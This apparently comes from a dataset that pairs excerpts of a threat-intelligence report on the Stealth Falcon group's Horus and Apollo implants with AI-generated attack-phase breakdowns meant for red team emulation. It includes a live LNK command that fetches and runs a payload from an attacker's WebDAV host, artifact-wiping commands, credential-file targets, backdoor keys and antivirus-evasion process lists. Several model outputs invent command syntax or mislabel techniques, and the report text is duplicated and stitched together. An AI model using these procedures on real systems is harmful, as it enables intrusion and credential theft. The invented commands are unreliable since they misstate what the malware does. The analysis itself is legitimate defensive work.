Model: gpt-4o

Phase: Execution

• Technique: System Information Discovery
• Procedure: Utilizes Windows APIs to gather power status with GetSystemPowerStatus, retrieves user profile path for username extraction, and collects detailed process information including process ID, architecture, name, running user, path, and parent process ID.

Phase: Discovery

• Technique: Network Configuration Discovery
• Command: Queries with SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = 'True' to gather network settings including hostname, IP addresses, DHCP, DNS settings, gateway, and network adapters information.

Phase: Execution

• Technique: Shellcode Injection
• Tool/Command: Custom shinjectchunked command
• Procedure: Injects shellcode into a remote process using a developed custom agent. It injects into targeted executables in the %SYSTEMROOT%\System32 directory. Shellcode is sent in chunks, combined, and injected. The two methods offered include:
  • Classic Process Injection: Opens the process, allocates and writes memory, then creates a remote thread.
  • Stealth Parameter Option: Additional methods depending on stealth requirements.

Figure 18 – Shellcode injection, a variant with no parameters. In the second method, the stealth option first checks for several processes running on the machine. Curiously, all of them are related to only one security vendor, Sophos: ALsvc.exe SEDService.exe SophosHealth.exe SSPService.exe hmpalert.exe Sophos UI.exe SophosIPS.exe McsAgent.exe SophosFileScanner.exe SophosNetFilter.exe McsClient.exe SophosFS.exe SophosNtpService.exe If any of those processes run on the infected machine, it defaults to the first simple process injection method. Otherwise, the stealth method injects shellcode into the same process by allocating memory, copying the received shellcode to it, and creating a thread to execute it. Figure 19 – Shellcode injection. Customization and Capabilities Previously, we observed Stealth Falcon customizing existing open-source Mythic agents (as discussed in the following section). In contrast, the new Horus Agent appears to be written from scratch. In addition to adding custom commands, the threat actors placed additional emphasis on the agent’s and its loader’s anti-analysis protections and counter-defensive measures. This suggests that they have deep knowledge of both their

Model: gpt-4o

Phase: Defense Evasion

• Technique: Process Discovery
• Procedure: The stealth method checks for specific processes associated with Sophos security software: ALsvc.exe, SEDService.exe, SophosHealth.exe, SSPService.exe, hmpalert.exe, Sophos UI.exe, SophosIPS.exe, McsAgent.exe, SophosFileScanner.exe, SophosNetFilter.exe, McsClient.exe, SophosFS.exe, SophosNtpService.exe. If detected, it defaults to a simple process injection.

Phase: Execution

• Technique: Process Injection
• Procedure: If Sophos processes are not running, the method involves allocating memory, copying shellcode into the allocated memory, and creating a thread to execute the shellcode within the same process.

Phase: Initial Access and Customization

• Technique: Custom Agent Development
• Procedure: Deployment of a custom-developed Horus Agent with focus on anti-analysis protections and counter-defensive measures, indicating sophisticated threat actor capabilities.

victims and/or the security solutions in use. The agent’s command list reveals that the threat actors intentionally limited its capabilities, focusing on the most essential functions: fingerprinting the victim’s machine to assess its value and deploying next-stage payloads if the target is deemed worthwhile. This approach likely helps safeguard their other custom post- exploitation payloads, some of which we discuss in the following sections. When Apollo meets Star Trek Stealth Falcon has a history of using Mythic agents as an initial payload. Between 2022 and 2023, we observed multistage loaders used by Stealth Falcon, some of which delivered a customized version of Apollo, an open-source .NET agent for Mythic framework. These loaders all had a .cpl (Control Panel file) extension. Interestingly, most of them were named after characters from Star Trek, such as JeanLucPicardbrownie.cpl,crunch- TravisMayweather.cpl,LonSuderVash.cpl. These CPLs were distributed through spear-phishing emails that contained a link to an actor-controlled remote server: Figure 20 – Phishing email sent to a high-profile victim in Qatar. Instead of a document link, the email contains a link to an attacker-controlled WebDAV server. While the exact infection chain between the email and the CPL remains unclear, the malware execution in this case relies on WebDAV. This explains why one of the stages within the loader, likely an attempt to delete artifacts related to the infection chain, removes the Windows WebDAV cache by deleting all files in the following directory: %WINDIR%\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV.

Model: gpt-4o

Phase: Initial Access

• Technique: Phishing via Malicious Links
• Procedure: The attacker sends spear-phishing emails with links to an attacker-controlled WebDAV server hosting .cpl files named after Star Trek characters.

Phase: Execution

• Technique: Execution via Control Panel Items
• Procedure: Execution of .cpl files delivered from the WebDAV server to initiate the infection process.

Phase: Defense Evasion

• Technique: Clear WebDAV Cache
• Command: Delete Windows WebDAV cache to remove artifacts:
• Command: del /Q %WINDIR%\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\*

Phase: Payload Deployment

• Technique: Custom .NET Agent Deployment
• Procedure: Deploy a customized version of the Apollo agent from the Mythic framework as a post-exploitation tool.

(Note: Command syntax is inferred where not explicitly provided.)

CPL loaders start two different loading chains. The first loading chain was thoroughly analyzed by ESET and ends with a shellcode downloader that is supposed to retrieve a shellcode from the attackers’ C2 server. Similar to ESET’s experience, we didn’t manage to retrieve the payload but can assume it’s one of the known payloads used by the group, some of which we discuss later. Figure 21 – Multi-stage loading chain delivering a downloader that is designed to retrieve shellcode from the C2 server. The second one is similar: Figure 22 – Chain loading custom Apollo Mythic agent in memory. It includes the following stages: CPL decrypts the embedded second-stage (shellcode) using XOR. CPL spawns a new process in a suspended state (we observed C:\Windows\system32\WWAHost.exe as a host process), injects the decrypted shellcode into it and executes the shellcode. The shellcode then allocates and executes an additional DLL, a .NET-based loader. The loader loads the final payload, a .NET portable executable which is a customized Apollo implant. Customized Apollo agent Apollo is a Windows agent for Mythic framework written in C#. The implant used by Stealth Falcon is obfuscated with ConfuserEx using Control Flow and string obfuscations. While Mythic supports a wide range of commands, the threat actors chose to use only a very small subset of them, but also customized the agent with a few additional commands.

Model: gpt-4o

Phase: Initial Access

• Technique: CPL Loader Execution
• Procedure: Attack begins with the execution of a CPL file to initiate the loading chain.

Phase: Execution

• Technique: Shellcode Injection via Process Hollowing
• Procedure:
• Action: Decrypt embedded shellcode using XOR.
• Command: Likely similar to: xor_decrypt <cpl_file> <output_shellcode>
• Action: Spawn a new process in a suspended state using WWAHost.exe.
• Command: C:\Windows\System32\WWAHost.exe /s
• Action: Inject decrypted shellcode into the suspended process and resume it.
• Technique Involved: Process Hollowing

Phase: Execution (continued)

• Technique: DLL Injection
• Procedure: Allocate and execute an additional DLL using the injected shellcode.

Phase: Execution (continued)

• Technique: .NET Loader Execution
• Procedure: Execute a .NET-based loader that launches the final payload.

Phase: Execution (Final Payload)

• Technique: Customized Mythic Apollo Agent
• Procedure: Load and execute a customized Apollo implant, obfuscated with ConfuserEx.
• Technique Used: Control Flow and String Obfuscations

Note:

• Customization: Specific Apollo agent commands and customization not detailed, focusing on known capabilities of the Mythic framework with some bespoke modifications.

From the overview of all the supported commands, it’s clear that the list closely resembles that of the C++ implant: Name Description Is Custom config Update the implant config. Yes exit Task the implant to exit. No jobkill Kill a job specified by the job identifier (jid). No ls [-Path [path]] List files and folders in a specified directory [path]. Defaults to the current working directory. No shinject Inject shellcode into a remote process. No shinjectchunked Receive shellcode in chunks from the C2, then inject it into a remote process or into the current process, based on if the “stealth” parameter sent with the shellcode Yes shinjectstealth Inject shellcode into the current process Yes survey Custom enumeration on the system. Yes The differences between custom Apollo and the Horus Agent are quite limited in terms of C2 capabilities: The Horus variant includes the upload command, built-in in Mythic. which their Apollo implant lacks. The Horus variant merges 2 custom commands, shinjectchuncked and shinjectstealth into one, using “stealth mode” as a parameter. This short comparison convinced us that Horus is a more advanced version of the threat groups’ custom Apollo implant, rewritten in C++, improved, and refactored. Similar to the Horus version, the Apollo version introduces extensive victim fingerprinting capabilities while limiting the number of supported commands. This allows the threat actors to focus on stealthy identification of the infected machine and next stage payload delivery, while also keeping the implant size significantly smaller (only 120Kb) than the full agent. More LOLBins and WebDAVs This email was sent to a high-profile entity in Qatar in October 2023: Figure 23 – Phishing email sent to one of the victims.

Model: gpt-4o

Phase: Command and Control (C2)

• Technique: Implant Command Set
• Command: config
  • Description: Update the implant configuration.
• Command: exit
  • Description: Task the implant to exit.
• Command: jobkill <jid>
  • Description: Kill a job specified by the job identifier.
• Command: ls [-Path [path]]
  • Description: List files and folders in a specified directory. Defaults to the current directory.
• Command: shinject
  • Description: Inject shellcode into a remote process.
• Command: shinjectchunked
  • Description: Receive shellcode in chunks from the C2, then inject into a remote process or current process based on the “stealth” parameter.
• Command: shinjectstealth
  • Description: Inject shellcode into the current process.
• Command: survey
  • Description: Conduct custom enumeration on the system.

Phase: Execution

• Technique: Shellcode Injection
• Procedure: Use commands like shinject, shinjectchunked, and shinjectstealth to inject shellcode into processes for payload execution.

Phase: Reconnaissance

• Technique: System Fingerprinting
• Procedure: Conduct extensive victim fingerprinting using the survey command to identify infected machines and determine further actions.

Additional Context

• Comparison: The Horus variant includes an upload command not present in the Apollo implant.
• Enhancements: The Horus implant combines certain shellcode injection commands for streamlined functionality, indicating improved stealth and efficiency over the Apollo variant.
• Focus: Stealthy identification and payload delivery, with a smaller implant size for the Apollo variant, enhancing undetectability.

The email contained an attached ZIP file Supplier prequalification application form.zip which in turn contained the LNK file Supplier.lnk. The LNK file, when executed, runs the following command: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter "C:\Windows\system32\cmd.exe" ) ( ) ) ( ) ( ) ( ) cmd /c DeviceCredentialDep^loyment & cmd /V:ON /C "set EDITOR=chttpim& pushd \mystartupblog.com@ssl@443\eQwcvcZIy&start /B https://mystartupblog.com/ ePkNWY/deUsplnb.pdf&timeout 8&@for^files /p c:\windows /m notepad.exe /c \ \mystartupblog.com@ssl@443\eQwcvcZIy\Supplier0.8bps&popd" "C:\Windows\system32\cmd.exe" ) ( ) ) ( ) ( ) ( ) cmd /c DeviceCredentialDep^loyment & cmd /V:ON /C "set EDITOR=chttpim& pushd \mystartupblog.com@ssl@443\eQwcvcZIy&start /B https://mystartupblog.com/ ePkNWY/deUsplnb.pdf&timeout 8&@for^files /p c:\windows /m notepad.exe /c \ \mystartupblog.com@ssl@443\eQwcvcZIy\Supplier0.8bps&popd" "C:\Windows\system32\cmd.exe" ) ( ) ) ( ) ( ) ( ) cmd /c DeviceCredentialDep^loyment & cmd /V:ON /C "set EDITOR=chttpim& pushd \mystartupblog.com@ssl@443\eQwcvcZIy&start /B https://mystartupblog.com/ ePkNWY/deUsplnb.pdf&timeout 8&@for^files /p c:\windows /m notepad.exe /c \ \mystartupblog.com@ssl@443\eQwcvcZIy\Supplier0.8bps&popd" DeviceCredentialDeployment.exe is a known LOLBin used for hiding the CMD window so it runs in the background: cmd /V:ON /C enables delayed environment variable expansion and runs the following command. set EDITOR=chttpim sets an environment variable EDITOR to the value chttpim. Likely, this value is later used in the attackers’ script. pushd \mystartupblog.com@ssl@443\eQwcvcZIy changes the current directory to a network location \ \mystartupblog.com@ssl@443\eQwcvcZIy start /B https://mystartupblog.com/ePkNWY/deUsplnb.pdf opens the lure URL in the default browser in the background (/B flag). Unfortunately, the PDF was unavailable when we discovered the file. Forfiles is another LOLBin which executes a command if there is a match for its condition. In this case /p c:\windows specifies the path to look for a specific file, and /m notepad.exe specifies which one. /c \mystartupblog.com@ssl@443\eQwcvcZIy\Supplier0.8bps specifies the command to execute (as notepad.exe always will be found in c:\windows). The file was unavailable but we assume that it is a script that delivers the next stage and uses the previously set EDITOR environment variable. popd returns to the previous directory after the pushd. This case is another notable example of how the threat actors combine multiple LOLBins in one infection chain that relies on WebDAV.

Model: gpt-4o

Phase: Initial Access

• Technique: Malicious LNK File
• Procedure: The threat actor sends a ZIP file containing an LNK file, which executes a command upon being opened.

Phase: Execution

• Technique: Windows Command Shell and Living off the Land Binaries (LOLBins)
• Command: bash "C:\Windows\system32\cmd.exe" ) ( ) ) ( ) ( ) ( ) cmd /c DeviceCredentialDep^loyment & cmd /V:ON /C "set EDITOR=chttpim& pushd \\mystartupblog.com@ssl@443\eQwcvcZIy&start /B https://mystartupblog.com/ePkNWY/deUsplnb.pdf&timeout 8&@for^files /p c:\windows /m notepad.exe /c \\mystartupblog.com@ssl@443\eQwcvcZIy\Supplier0.8bps&popd"
• Details:
• DeviceCredentialDeployment.exe is used to hide the command window (LOLBIN).
• pushd switches to a network directory.
• start /B opens a URL in the browser in the background.
• forfiles executes a command if a file (notepad.exe) is found, likely executing a script from the network location.
• popd returns to the original directory.

Phase: Command and Control

• Technique: WebDAV for Remote File Execution
• Procedure: Utilizes WebDAV to access and execute scripts from a remote network location.

Note: This operation combines various LOLBins to stealthily achieve execution without traditional malware.

Post-compromise Toolset In addition to Deadglyph’s on-disk components, most of which are protected by Themida/OLLVM or both, we also recently observed some previously undocumented tools related to Stealth Falcon activity. In this section we provide the analysis of what we consider to be the most interesting ones. DC Credential Dumper This component is deployed by a loader that resembles Horus. It’s obfuscated using Code Visualizer, and manually maps kernel32.dll and ntdll.dll, injects into C: \Windows\System32\UserAccessBroker.exe, maps shellcode into the process, and then executes it. This tool is relatively simple, but it’s built around an interesting concept: stealing Active Directory and Domain Controller credential-related files by accessing a VHD copy of the system’s disk, which lets it effectively bypass file locks and standard security protections. The credential dumper appears to be designed to work in conjunction with another component (which we haven’t observed). It seemingly targets an already-compromised Domain Controller, relying on a separate module to create a virtual disk copy at the path C:\ProgramData\ds_notifier_0.vhdx. The ds_notifier naming convention mimics that of legitimate Trend Micro components. The dumper specifically targets the following files: Windows\NTDS\NTDS.dit Windows\System32\Config\SAM Windows\System32\Config\SYSTEM These files, when combined, allow an attacker to extract, decrypt, and abuse credentials — either offline or for use in live attacks. As these files are actively used and locked by system processes, the tool bypasses these restrictions by operating on a virtual disk instead. To achieve this, the dumper uses the open-source .NET library DiscUtils to read and extract the targeted files directly from the VHD (C:\ProgramData\ds_notifier_0.vhdx). It then compresses each file using Gzip:

Model: gpt-4o

Phase: Credential Access

• Technique: Credential Dumping via Virtual Disk
• Procedure:
• Injection & Execution: The threat actor's DC Credential Dumper component is injected into C:\Windows\System32\UserAccessBroker.exe using shellcode execution.
• File Targeting: Targets credential-related files by accessing a virtual disk (C:\ProgramData\ds_notifier_0.vhdx) to bypass file locks:
  • Windows\NTDS\NTDS.dit
  • Windows\System32\Config\SAM
  • Windows\System32\Config\SYSTEM
• File Extraction: Utilizes the open-source .NET library DiscUtils to read and extract the files directly from the virtual disk.
• Compression: Files are compressed using Gzip for exfiltration or further manipulation.

Figure 24 – Use of DiscUtills library to read files from a virtual disk. After extraction, the tool bundles all the output files into a single compressed ZIP archive which is saved as C: \ProgramData\ds_notifier_2.vif. Notably, this credential dumper does not include any C2 or exfiltration mechanism and likely relies on some other component to retrieve or exfiltrate the resulting archive. The tool also includes a logging feature which is controlled by an encrypted byte flag. If this flag is set to 1, the tool creates and writes logs to %temp%\logfile.log. Passive backdoor The passive backdoor sample named usrprofscc.exe is a tiny application written in C. Its main purpose is to listen for incoming requests and execute shellcode payloads from them. The backdoor is mostly unobfuscated, except for some string encryption using a simple algorithm based on a single key shared across all strings which applies an addition operation between a character in a string and a character in the key: Figure 25 – Example of a string decryption routine. The executable also contains two AES-encrypted data blobs: one stores information about the service that will run the backdoor, and the other contains auxiliary constant values for network communication. Both are encrypted with the same key: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter aes_key_1 = { 5D EC B6 42 02 98 AF F8 4A E6 A9 EF 57 1B 41 29 14 8D 09 BB 99 DD 08 D8 57 A7 2D 3F 6E D1 DA FA } aes_iv_1 = { E6 A6 D2 5A 3F B5 57 43 F2 26 B5 B4 B4 DC A8 56 } aes_key_1 = { 5D EC B6 42 02 98 AF F8 4A E6 A9 EF 57 1B 41 29 14 8D 09 BB 99 DD 08 D8 57 A7 2D 3F 6E D1 DA FA } aes_iv_1 = { E6 A6 D2 5A 3F B5 57 43 F2 26 B5 B4 B4 DC A8 56 } aes_key_1 = { 5D EC B6 42 02 98 AF F8 4A E6 A9 EF 57 1B 41 29 14 8D 09 BB 99 DD 08 D8 57 A7 2D 3F 6E

Model: gpt-4o

Phase: Collection

• Technique: Reading Files from Virtual Disk
• Procedure: Utilizes the DiscUtills library to extract files from a virtual disk.

Phase: Data Compression

• Technique: Archive via Utility
• Procedure: Bundles extracted files into a compressed ZIP archive saved as C:\ProgramData\ds_notifier_2.vif.

Phase: Logging

• Technique: Logging of Execution Details
• Procedure: Controlled by an encrypted byte flag. If set to 1, logs are created and written to %temp%\logfile.log.

Phase: Persistence

• Technique: Passive Backdoor Deployment
• Procedure: A backdoor application named usrprofscc.exe listens for incoming requests to execute shellcode payloads.

Phase: Execution

• Technique: Decryption Routine
• Procedure: Uses a simple string encryption/decryption algorithm with a shared key, applying an addition operation between characters and the key.

Phase: Network Communication

• Technique: Encrypted Configuration

• Procedure: Stores configuration data for network communication using AES encryption with specified keys and IVs.

• AES Key: 5D EC B6 42 02 98 AF F8 4A E6 A9 EF 57 1B 41 29 14 8D 09 BB 99 DD 08 D8 57 A7 2D 3F 6E D1 DA FA

• AES IV: E6 A6 D2 5A 3F B5 57 43 F2 26 B5 B4 B4 DC A8 56

D1 DA FA } aes_iv_1 = { E6 A6 D2 5A 3F B5 57 43 F2 26 B5 B4 B4 DC A8 56 } The sample has three running modes based on the arguments it receives: install – Create a new service. uninstall – Delete and stop the created service. debug – Debugging mode in which the program manually calls the main service function via StartServiceCtrlDispatcherA, allowing it to run without being managed by the Service Control Manager. This may be used to test the backdoor without needing to install it as a Windows service. The backdoor requires admin permissions to run. When install mode is triggered, the service is created with the following parameters: Service Name: UsrProfSCC Service Display Name: User Profile Service Check Service Description: This service checks for the service that supports user profile updating. Figure 26 – Service creation from the install mode.

Model: gpt-4o

Phase: Installation

• Technique: Create or Modify System Process (Service Installation)
• Procedure:
• Mode: Install
• Command/Function:
  • Creates a new service using the following parameters:
  • Service Name: UsrProfSCC
  • Service Display Name: User Profile Service Check
  • Service Description: This service checks for the service that supports user profile updating.

Phase: Defense Evasion

• Technique: Disabling Security Tools (Debugging Mode)
• Procedure:
• Mode: Debug

• Function: Uses StartServiceCtrlDispatcherA to manually call the main service function, allowing it to run without being managed by the Service Control Manager. This enables testing the backdoor without installing it as a Windows service.

• Technique: Uninstall Service

• Procedure:
• Mode: Uninstall
• Function: Deletes and stops the created service UsrProfSCC.

The service creates a socket that listens for requests. If a request is received, it undergoes AES decryption and validation. If successful, depending on a parameter in the received data, the service can either begin a new communication by connecting to a socket or listen to a new socket as specified in the request. In both cases, the received shellcode is treated the same way: a thread is created that is responsible for executing it. Based on the parameters in the data received: A shellcode can be executed directly, without accounting for its result, or A pipe with a random name is created, which can be used to send back the results of the executed shellcode. In both cases, an indication of thread finish/thread results is returned. All the network communication is encrypted using AES with the same keys as the service information. Custom keylogger The keylogger is delivered by its loader, a DLL called StatusReport.dll, written in C++. The loader uses simple XOR string decryption, with most of the strings being encrypted: Figure 27 – String obfuscation. The loader also uses API hashing, although surprisingly, not all API imports are hashed. Some of them remained unobfuscated, such as: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter ExpandEnvironmentStringsA WriteProcessMemory GetThreadContext SetThreadContext ResumeThread

Model: gpt-4o

Phase: Execution

• Technique: Shellcode Execution via Network Communication
• Procedure: A socket listens for incoming requests. Upon receipt, data is AES-decrypted and validated. A new thread executes shellcode directly or via a named pipe, allowing for result collection.

Phase: Execution

• Technique: Thread Creation for Shellcode
• Procedure: Threads are created to execute shellcode, with options to disregard results or use a randomly named pipe for result transmission.

Phase: Defense Evasion

• Technique: Encrypted Communication
• Procedure: All network communication leverages AES encryption using predefined keys.

Phase: Execution

• Technique: Keylogger Deployment via DLL
• Tool: StatusReport.dll (Keylogger Loader)
• Procedure: The DLL decrypts strings using XOR encryption and utilizes API hashing, selectively unobfuscating specific API functions.

Phase: Defense Evasion

• Technique: String and API Obfuscation
• Procedure: The loader employs XOR for string decryption and API hashing, leaving some API imports unobfuscated, such as ExpandEnvironmentStringsA, WriteProcessMemory, GetThreadContext, SetThreadContext, and ResumeThread.

ExpandEnvironmentStringsA WriteProcessMemory GetThreadContext SetThreadContext ResumeThread ExpandEnvironmentStringsA WriteProcessMemory GetThreadContext SetThreadContext ResumeThread This might be an indicator that the code that uses them was added separately. After resolving the imports, the loader tries to impersonate explorer.exe by grabbing and duplicating its token. It then attempts to start the process %windir%\system32\dxdiag.exe using the function CreateProcessAsUserA and finally, writes shellcode into the newly created process. The shellcode resides inside the original DLL, unencrypted. The shellcode then does the same import resolving, loads a DLL embedded in it in unencrypted form, and calls the export _1 of the loaded DLL. The keylogger DLL, unlike the components that loaded it, doesn’t use API hashing. First, it sets up RC4 keys based on the hard-coded one it contains. Then it decrypts the config using the RC4 key 667F879621D8F492. The decrypted config looks like this: Plain text Copy to clipboard Open code in new window EnlighterJS 3 Syntax Highlighter struct config{ DWORD key_size = 0x20; char rc4_key[0x20] = {F5 42 D8 EB CA 0C 56 F8 1F 21 0F 43 D4 F1 44 A0 42 87 08 AC CA F8 9A DE 44 CC 01 0B 65 0C FA E3} DWORD ukn_1; DWORD ukn_2; wchar_t path[256] = L"C:\Windows\Temp\~TN%LogName%.tmp"; wchar_t log_name[32] = L"LogName"; DWORD uuid_related; } struct config{ DWORD key_size = 0x20; char rc4_key[0x20] = {F5 42 D8 EB CA 0C 56 F8 1F 21 0F 43 D4 F1 44 A0 42 87 08 AC CA F8 9A DE 44 CC 01 0B 65 0C FA E3} DWORD ukn_1; DWORD ukn_2; wchar_t path[256] = L"C:\Windows\Temp\~TN%LogName%.tmp"; wchar_t log_name[32] = L"LogName"; DWORD uuid_related; }

Model: gpt-4o

Phase: Execution

• Technique: Process Injection
• Procedure: Use of API calls ExpandEnvironmentStringsA, WriteProcessMemory, GetThreadContext, SetThreadContext, and ResumeThread to perform process injection. The threat actor injects shellcode into a newly created process.

Phase: Defense Evasion

• Technique: Process Impersonation
• Procedure: The loader impersonates explorer.exe by duplicating its token.

Phase: Execution

• Technique: Create Process with Token
• Command: CreateProcessAsUserA to start the process %windir%\system32\dxdiag.exe as part of the injection routine.

Phase: Execution

• Technique: Shellcode Injection
• Procedure: The threat actor writes shellcode into the newly created process. This shellcode resolves imports and loads an embedded DLL, executing its export _1.

Phase: Credential Access

• Technique: Keylogging
• Procedure: The loaded keylogger DLL sets up RC4 keys using a hard-coded key, decrypts its configuration, and logs keystrokes. The configuration specifies a path for storing log files and uses RC4 decryption for secure storage.

struct config{ DWORD key_size = 0x20; char rc4_key[0x20] = {F5 42 D8 EB CA 0C 56 F8 1F 21 0F 43 D4 F1 44 A0 42 87 08 AC CA F8 9A DE 44 CC 01 0B 65 0C FA E3} DWORD ukn_1; DWORD ukn_2; wchar_t path[256] = L"C:\Windows\Temp\~TN%LogName%.tmp"; wchar_t log_name[32] = L"LogName"; DWORD uuid_related; } After config decryption, the keylogger sets up various APIs for its keystroke capture functionality and continuously writes all the logged keystrokes to a file under C:/windows/temp, encrypted with the RC4 key from the configuration. The keylogger doesn’t have any C2 communication functionality, so it needs to work in conjunction with some other component which is able to grab the output file and send it to the C2 server. Conclusion Stealth Falcon is continuously evolving to become even more effective. The threat actors’ recent operations involve the use of a zero-day vulnerability (CVE-2025-33053) and showcase a creative approach to infection chains by leveraging WebDAV, LOLBins, multi-stage loaders, and a mix of native and .NET components. The threat actors have also been putting significant effort into improving the stealth and resilience of their payloads. Stealth Falcon employs commercial code obfuscation and protection tools, as well as custom- modified versions tailored for different payload types. This makes their tools more difficult to reverse- engineer and complicates tracking technical changes over time. For their attack infrastructure, Stealth Falcon consistently buys and repurposes older, legitimate domains through the NameCheap registrar, typically in the .net or .com TLDs. Older domains with a clean history and established reputation are less likely to be flagged as malicious by security systems, and their use also helps complicate attribution and infrastructure tracking. All of this enables Stealth Falcon to ensure their custom payloads remain undetected in monitored environments—or at the very least, makes them hard to track, analyze, and attribute. Protections Check Point Threat Emulation, Intrusion Prevention System and Harmony Endpoint provide comprehensive coverage of attack tactics, and file types, and protect against the attacks and threats described in this report. IOCs Hashes: ba5beb189d6e1811605b0a4986b232108d6193dcf09e5b2a603ea4448e6f263c url file e0a44274d5eb01a0379894bb59b166c1482a23fede1f0ee05e8bf4f7e4e2fcc6 url file

Model: gpt-4o

Phase: Initial Access

• Technique: Zero-day Exploit via CVE-2025-33053
• Procedure: Exploits the vulnerability to gain access.

Phase: Execution

• Technique: DLL and .NET Component Execution
• Procedure: Utilizes multi-stage loaders with a mix of native and .NET components to load payloads.

Phase: Persistence

• Technique: Malicious File Drop
• Command: Keylogger saves keystrokes to C:\Windows\Temp\~TN%LogName%.tmp using RC4 encryption.

Phase: Credential Access

• Technique: Keylogging
• Procedure: Sets up APIs for keystroke capture and logs data encrypted with RC4.

Phase: Defense Evasion

• Technique: Obfuscation and Code Protection
• Procedure: Uses commercial code obfuscation and custom-modified versions for different payloads to evade detection.

Phase: Infrastructure

• Technique: Legitimate Domain Repurposing
• Procedure: Buys older legitimate domains to complicate attribution and evade detection.

da3bb6e38b3f4d83e69d31783f00c10ce062abd008e81e983a9bd4317a9482aa Horus Loader ddce79afe9f67b78e83f6e530c3e03265533eb3f4530e7c89fdc357f7093a80b Horus Agent 1d95a44f341435da50878eea1ec0a1aab6ae0ee91644c497378266290a6ef1d8 custom Apollo 700b422556f070325b327325e31ddf597f98cc319f29ef8638c7b0508c632cee keylogger loader aa612f53e03539cdc8f8a94deee7bf31f0ac10734bb9301f4506b9113c691c97 keylogger 66a893728a0ac1a7fae39ee134ad4182d674e719219fbf5d9b7cd4fd4f07f535 passive backdoor cd6335101e0187c33a78a316885a2cbf4cbbd2a72daf64a086edb4a2615749fb credential dumper loader 257c63a9e21b829bb4b9f8b0e352379444b0e573176530107a3e6c279d1919da credential dumper 5671b3a89c0e88a9bfb0bd5bc434fa5245578becfdeb284f4796f65eecbd6f15 3259ecfb96d3d7e2d1a782b01073e02b3488a3922fd2fd35c20eeb5f44b292ec 8065c85e387654cb79a12405ff0f99fd4ddd5a5d3b9876986b82822bd10c716f 0598e1af6466b0813030d44fa64616eea7f83957d70f2f48376202c3179bd6b1 f270202cd88b045630f6d2dec6d5823aa08aa66949b9ccd20f6e924c7992fea7 092c344330bd5cba71377dead11946f7277f2dd4af57f5b636b70b343bc7ebe0 dc7cb53c5dc2e756822328a7144c29318cb871890727eff9c8da64a01e8e782d db7364296cc8f78981797ffb2af7063bba97e2f6631c29215d59f4979f8b4fce 4e045c83cf429210e71e324adccad8818540b9805a44c8d79a8c16c3d5f6fbb6 62797e28a334e392cb56fcc26dd07f04ac031110f0e9ed8489ec0825beea75eb dec6dda0559e381c23f1dfbe92fa4705c8455430f8278c78c170a7533b703296 32f2773ceb6503f8a1c3e456d34ceda5c188974a115e5225a1315e7ec3f8eb5e 50a2b6c1b0a0d308e8016aece9629c1bf6ca4ecc6f4cef34c904e9c3e82355fb 9ed8f51548a004ac61b7176df12a0064dc3096088cbf3c644a9abdb5c92936f7 9a82e21c2463d6c23a48409a862e668ed9c205468d216d2280f7debe1ab1ddd8 46c95af6fea41b55fa0ab919ec81d38a584e32a519f85812fe79a5379457f111 c5b00e8312e801dc35652c631a14270ed4eec8f6d90d08cdde3c6e7fd1ec24b6 3b83250383c2a892e0ca86e54fcc6aca9960fc4b425ab9853611ff3e5aa2f9c6 8291b886cce1f0474db5b3dc269adf31d1659b7d949f62ea23608409d14b9ceb Domains: roundedbullets[.]com summerartcamp[.]net downloadessays[.]net joinushealth[.]com healthherofit[.]com worryfreetransport[.]com radiotimesignal[.]com

Model: gpt-4o

Unfortunately, the provided text seems to be a list of hashes and domains without descriptions of specific tactics, techniques, and procedures (TTPs). For me to help extract the procedures used by the threat actor, a more detailed context or narrative from a CTI report would be needed. Specifically, information about how the threat actors use command lines, tools, and techniques in their attacks is essential.

If more detailed information regarding the threat actor's activities and methods is available, please share it so I can assist in structuring the procedures for red team emulation.

Model: gemini-2.0-flash

Okay, here's the structured output of procedures extracted from the CTI report.

Phase: Initial Access

• Technique: Spear-Phishing Email with Malicious .URL File
• Procedure: The attacker sends a spear-phishing email with an archived attachment containing a .URL file.
• Note: User interaction required to open the .URL file.

Phase: Execution

• Technique: Exploitation of CVE-2025-33053 via .URL File

• Procedure: The .URL file exploits CVE-2025-33053 to achieve remote code execution. The .URL file manipulates the working directory of iediagcmd.exe

• Technique: Execution via iediagcmd.exe and WebDAV

• Procedure: Legitimate iediagcmd.exe is used to execute route.exe (Horus Loader) from an attacker-controlled WebDAV server.

• Command: C:\Program Files\Internet Explorer\iediagcmd.exe with a WorkingDirectory pointing to an attacker's WebDAV server.

• Technique: Execution of CustomShellHost.exe and WebDAV

• Procedure: Legitimate CustomShellHost.exe is used to spawn explorer.exe from its working folder, enabling execution of attacker-controlled code.

Phase: Persistence and Defense Evasion (Horus Loader - route.exe)

• Technique: Multi-Stage Loader (route.exe)

• Procedure: route.exe (Horus Loader) is executed from the WebDAV server. It acts as a multi-stage loader written in C++ and protected by Code Virtualizer.

• Technique: Process Termination (via Horus Loader)

• Procedure: The Horus Loader attempts to terminate running processes using taskkill.exe.
• Command: taskkill.exe /IM i /F (attempts to terminate processes, but due to a bug, terminates non-existent processes)

• Command: taskkill.exe /IM e /F (attempts to terminate processes, but due to a bug, terminates non-existent processes)

• Technique: Antivirus Evasion (via Horus Loader)

• Procedure: The Horus Loader scans running processes to detect security solutions. If antivirus processes are detected, a flag is set. If a predefined flag is set and a specific security vendor is detected, the malware stops execution.

• Technique: Decoy Document Execution (via Horus Loader)

• Procedure: The Horus Loader decrypts a PDF decoy document from its .udata section and executes it using cmd.exe.

• Command: cmd.exe /c %temp%\TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf

• Technique: Process Injection (via Horus Loader)

• Procedure: The loader creates a suspended msedge.exe process, injects shellcode, and resumes execution.

• API Calls: ZwAllocateVirtualMemory, ZwWriteVirtualMemory, NtProtectVirtualMemory, GetThreadContext, SetThreadContext, NtResumeThread, CloseHandle.

• Technique: PE Injection

  • Procedure: Shellcode decrypts another blob (DLL), maps it into the memory and executes its _1 export

Phase: Command and Control (Horus Agent)

• Technique: Custom Mythic Agent (Horus Agent) Communication

• Procedure: Custom built agent for Mythic that performs network communication with C2 server using GET and POST requests. It firsts registers with the C2 server collecting information (username, OS, domain)

• Technique: API Hashing (Horus Agent)

